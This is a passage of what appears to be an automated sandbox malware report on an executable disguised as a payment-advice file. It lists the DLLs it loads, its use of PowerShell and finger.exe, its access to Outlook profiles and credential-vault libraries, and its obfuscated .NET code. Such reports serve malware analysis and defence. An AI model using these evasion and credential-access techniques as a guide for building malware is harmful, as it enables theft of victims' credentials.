                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: finger.pdb source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000004.00000002.2234307143.0000000001147000.00000004.00000020.00020000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 00000008.00000002.3552384724.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vTCmFjyxUmdTJX.exe, 00000008.00000002.3551724972.000000000077E000.00000002.00000001.01000000.0000000C.sdmp, vTCmFjyxUmdTJX.exe, 0000000A.00000000.2305994823.000000000077E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000009.00000003.2234352082.000000000366C000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000009.00000003.2236364471.0000000003813000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 00000009.00000003.2234352082.000000000366C000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3552963255.0000000003B5E000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000009.00000003.2236364471.0000000003813000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000009.00000002.3552963255.00000000039C0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: finger.pdbGCTL source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe, 00000004.00000002.2234307143.0000000001147000.00000004.00000020.00020000.00000000.sdmp, vTCmFjyxUmdTJX.exe, 00000008.00000002.3552384724.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, KV0H4piSssSUaiaZNB.cs.Net Code: zKmE2ANmT9 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, KV0H4piSssSUaiaZNB.cs.Net Code: zKmE2ANmT9 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.5140000.3.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_025B465B push edx; retf 0_2_025B4662
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_025B4658 push edx; retf 0_2_025B465A
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_025B46BB push edx; retf 0_2_025B46BE
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_025B46B8 push edx; retf 0_2_025B46BA
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_025B46BF push edx; retf 0_2_025B46C2
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_025B477B push ebp; retf 0_2_025B4782
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_025B47B1 push esi; retf 0_2_025B47B2
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_025BA560 pushfd ; retf 0_2_025BA7BA
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_025BC99B push cs; iretd 0_2_025BC99E
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_025B5E00 push eax; iretd 0_2_025B5E09
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_025B9D93 push ss; iretd 0_2_025B9D96
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_04D5148B push esp; iretd 0_2_04D51496
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_04D557F8 pushfd ; iretd 0_2_04D55802
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_04D51793 push esi; iretd 0_2_04D5179E
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_04D5179F push edi; iretd 0_2_04D517BE
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_04D51084 push edi; iretd 0_2_04D51092
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_04D51043 push esp; iretd 0_2_04D51046
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_04D522A2 push ebp; iretd 0_2_04D522A3
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_04D563D0 pushfd ; iretd 0_2_04D563D6
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_04D50F13 push esp; iretd 0_2_04D50F1E
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_04DA97E8 push eax; iretd 0_2_04DA97F6
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_04DAECF9 push eax; iretd 0_2_04DAED06
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 0_2_06BE1EA1 push esp; iretd 0_2_06BE1EAD
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0041605F push ecx; iretd 4_2_00416097
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_00416063 push ecx; iretd 4_2_00416097
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_00416833 push edx; iretd 4_2_00416835
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_00414884 push FFFFFFEBh; iretd 4_2_00414887
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_004018BF push ds; ret 4_2_004018C8
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_00412118 push esi; retf 4_2_00412119
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_0040DA11 push ecx; retf 4_2_0040DA30
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_004022BC push ds; ret 4_2_004022BD
                Source: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeStatic PE information: section name: .text entropy: 7.810640968604701
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, MPklYTee4fvmi5Q2c1I.csHigh entropy of concatenated method names: 'NP8XfAOFLc', 'WlYXzRSi3B', 'O71rhHQjLE', 'gOZreoXEwP', 'k2BrxiOca9', 'Aa5r0nFd6Q', 'aDOrEFtko1', 'A6irDSIVtK', 'fXPra6RGGu', 'TPbrg5pV6y'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, jJLKyJAxE6HsiNBBvP.csHigh entropy of concatenated method names: 'UI5upFeEt9', 'Tdau4kPrE7', 'wbCuFvcnFO', 'VwJuVRcoux', 'T0yum5N3Tw', 'tENudMAIjS', 'rv5ubWjOb0', 'g4KuYPpaj7', 'cAYujxeAHh', 'WBEu6arcb8'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, ID6meX97mTGI8LT01C.csHigh entropy of concatenated method names: 'uS8HFy1GX5', 'eEgHVVNgx9', 'RdjHoUx8wa', 'gjGHmVHiDu', 'vYlHdbKOMe', 'zaMHQkn4kI', 'jlYHbi5uTA', 'f9cHY4wjmb', 'buZHcmakI3', 'ROuHjU6bFB'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, GuJGowftkOERXJmvPh.csHigh entropy of concatenated method names: 'r8OXwqiDn1', 'HZ1XUAnxs8', 'yEoX5MTlPD', 'QwAXR0xlUV', 'zUSXHbyeGe', 'dPTXiy30Im', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, csDkKQ4NHVbjTw1g9v.csHigh entropy of concatenated method names: 'ReawZ6YpWc', 'tVCwGKSdKP', 'OblwpcTjLy', 'stHw4DnivD', 'ee8wKrr3Hg', 'q8kwNp2Fa5', 's2jwO5mYrS', 'uftwWcGBuV', 'gtQwHasJ8d', 'bCgwXCK4He'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, KV0H4piSssSUaiaZNB.csHigh entropy of concatenated method names: 'oXv0DfSWHF', 'AuM0a5pI80', 'kKW0gQ8SUn', 'NgF0woiHcW', 'jSt0U6QPtb', 'KVy05oNVWI', 'Pu70Rgfvvt', 'B7D0iVf5mE', 'jfy0Sg5Rb1', 'HsU0LfBuyB'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, yKMaMKvfdkcdtFZDTU.csHigh entropy of concatenated method names: 'OTtO7id5qX', 'zJGOfuR9v5', 'CFbWhT61No', 'UsgWePLYqw', 'nNPO6frLJo', 'CxwOMltGnO', 'KsWOATMMqh', 'PuaO8WouQH', 'AeNOJ4dlDC', 'sVXOy7xUcA'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, eU5W8SwCQbOrQxjxRt.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NyJx9gTMfw', 'bfJxf9yxSf', 'UEwxziYOYX', 'nV10hLwvAn', 'rFH0eMDL8G', 'XV30xE7Byk', 'suP00llpVW', 'cjKj84ikXoOaroKKChb'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, iNUCM9tY92HkOxV2AR.csHigh entropy of concatenated method names: 'FBHHKudUg0', 'iY7HO3bKmO', 'kfbHH3xIOW', 'nqQHrVRgJ3', 'V9rHlRbo17', 'ckVHqmlFWx', 'Dispose', 'Ma5WaHsymx', 'RgoWgEjAXQ', 'gDuWwbqFFS'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, YB4U4Uypy84m9B9S7g.csHigh entropy of concatenated method names: 'ToString', 'bHfN64AvXQ', 'QbjNV73L4G', 'AGJNoJ47wE', 'VZwNmdRuHF', 'vpVNdB2OSO', 'fkUNQrbygt', 'eQ7NbFGlmE', 'vTGNYO6h9q', 'zHMNcF4AFS'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, sb5XVGprnYjbJ1UAnT.csHigh entropy of concatenated method names: 'eAyg85iki4', 'sOKgJX4WoP', 'cQdgylTmoI', 'KXFg1s828M', 'srWgCIqLUg', 'OaNgvhMQGt', 'fnKgtTax8w', 'Pcng7i1Ee0', 'R4Rg9c53le', 'mwwgfQFl6O'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, DR81CAcRy0W9DSRI7B.csHigh entropy of concatenated method names: 'tRfRP284Ga', 'CneR34Y3dv', 'sYHR2YVaKJ', 'F9IRZVsvVO', 'iLFRI1bH9S', 'K5NRGUN6rs', 'ImDRkgAMcm', 'wgQRp06phu', 'IPZR4xHeYN', 'HZfRTrBjIw'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, JBeYd0FEn4ooKA4xnY.csHigh entropy of concatenated method names: 'KyY5DNputn', 'PDb5gKr4vZ', 'rkl5UR4ckR', 'tgh5Rs7vDW', 'sCS5i9E8gm', 'zxTUC5Ughj', 'ejqUv4WBp3', 'gNuUtY2Sy8', 'z5RU7mgAwU', 'laTU9qyLbJ'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, R66anNz2q1P8pFtND6.csHigh entropy of concatenated method names: 'kN4XGqECNF', 'UNNXpNvLVY', 'bhfX4MqfDA', 'Ag6XF0k43t', 'CssXVaZjLF', 'GyiXmsVK3t', 'sEwXdHr8kE', 'xYWXqrnGDe', 'ABEXPAIqsn', 'xGrX3LBdA4'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, bUtdjvehlvvWYiu3IN2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KkuX6fSwtF', 'NI4XMMKqFg', 'VrhXAIwhAa', 'wMjX89i1Mm', 'AG5XJheTKA', 'MQuXyauSoe', 'LVJX1dL5Zs'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, IoviSa8uwJLlOQrTFw.csHigh entropy of concatenated method names: 'x49KjyXhgk', 'fXDKMxftiu', 'LtAK8KIqhb', 'x7SKJXn231', 'TiTKVTOxy8', 'vmFKo4dj14', 'QsFKmpJx1a', 'CPgKdOn8op', 'wT3KQqvNyw', 'JBBKbvRrM7'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, UOZiJHEZURY3nGWcFY.csHigh entropy of concatenated method names: 'eOXeRb5XVG', 'tnYeijbJ1U', 'KNHeLVbjTw', 'Tg9esvS7Mj', 'gfEeKoUdBe', 'Ld0eNEn4oo', 'M0U8aXx9kCJApigKxd', 'AYxYJU46PdGWr9xhCg', 'XjVee7AXCE', 'mvxe0AMNgw'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, JyrsQCxIWGHxFgHFUJ.csHigh entropy of concatenated method names: 'nxL2oFu7Q', 'MscZ9gVvG', 'ApOGO0a2b', 'wFAkOn3EF', 'cOA4pVqBh', 'qGsTYureu', 'qolAwJgvu01AFepIim', 'vtPxVSjOgWBvpXbj8l', 'BO5pyIwsDjy5c7Jrj6', 'ftDWq9T0S'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, fdTTD6gFhr5JJ2rk1d.csHigh entropy of concatenated method names: 'Dispose', 'zHke9OxV2A', 'iY8xVjhG0o', 'XoXjC9Q66u', 'jVeef48fyS', 'yPLezNnuu1', 'ProcessDialogKey', 'dGmxhD6meX', 'WmTxeGI8LT', 'd1CxxFuJGo'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, l7MjAxTdkZDkNgfEoU.csHigh entropy of concatenated method names: 'nNdUIYBJmA', 'DR1UkGlVdy', 'QhewobwYuV', 'WaMwm9Ua1N', 'y9mwdtJRdE', 'HOiwQ7CctW', 'a7QwbMBRqF', 'qQUwY2WIK2', 'OyjwcanUmq', 'SrUwjCeaMR'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.7130000.4.raw.unpack, XXx3ffeEulv1336Gfe4.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OKWnHFw8bY', 'W7RnXyfjJP', 'j6RnrPobXJ', 'oocnnBMatK', 'DQDnlycWwU', 'wsMnBQJsQg', 'uHRnqN4sF1'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, MPklYTee4fvmi5Q2c1I.csHigh entropy of concatenated method names: 'NP8XfAOFLc', 'WlYXzRSi3B', 'O71rhHQjLE', 'gOZreoXEwP', 'k2BrxiOca9', 'Aa5r0nFd6Q', 'aDOrEFtko1', 'A6irDSIVtK', 'fXPra6RGGu', 'TPbrg5pV6y'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, jJLKyJAxE6HsiNBBvP.csHigh entropy of concatenated method names: 'UI5upFeEt9', 'Tdau4kPrE7', 'wbCuFvcnFO', 'VwJuVRcoux', 'T0yum5N3Tw', 'tENudMAIjS', 'rv5ubWjOb0', 'g4KuYPpaj7', 'cAYujxeAHh', 'WBEu6arcb8'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, ID6meX97mTGI8LT01C.csHigh entropy of concatenated method names: 'uS8HFy1GX5', 'eEgHVVNgx9', 'RdjHoUx8wa', 'gjGHmVHiDu', 'vYlHdbKOMe', 'zaMHQkn4kI', 'jlYHbi5uTA', 'f9cHY4wjmb', 'buZHcmakI3', 'ROuHjU6bFB'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, GuJGowftkOERXJmvPh.csHigh entropy of concatenated method names: 'r8OXwqiDn1', 'HZ1XUAnxs8', 'yEoX5MTlPD', 'QwAXR0xlUV', 'zUSXHbyeGe', 'dPTXiy30Im', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, csDkKQ4NHVbjTw1g9v.csHigh entropy of concatenated method names: 'ReawZ6YpWc', 'tVCwGKSdKP', 'OblwpcTjLy', 'stHw4DnivD', 'ee8wKrr3Hg', 'q8kwNp2Fa5', 's2jwO5mYrS', 'uftwWcGBuV', 'gtQwHasJ8d', 'bCgwXCK4He'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, KV0H4piSssSUaiaZNB.csHigh entropy of concatenated method names: 'oXv0DfSWHF', 'AuM0a5pI80', 'kKW0gQ8SUn', 'NgF0woiHcW', 'jSt0U6QPtb', 'KVy05oNVWI', 'Pu70Rgfvvt', 'B7D0iVf5mE', 'jfy0Sg5Rb1', 'HsU0LfBuyB'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, yKMaMKvfdkcdtFZDTU.csHigh entropy of concatenated method names: 'OTtO7id5qX', 'zJGOfuR9v5', 'CFbWhT61No', 'UsgWePLYqw', 'nNPO6frLJo', 'CxwOMltGnO', 'KsWOATMMqh', 'PuaO8WouQH', 'AeNOJ4dlDC', 'sVXOy7xUcA'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, eU5W8SwCQbOrQxjxRt.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NyJx9gTMfw', 'bfJxf9yxSf', 'UEwxziYOYX', 'nV10hLwvAn', 'rFH0eMDL8G', 'XV30xE7Byk', 'suP00llpVW', 'cjKj84ikXoOaroKKChb'
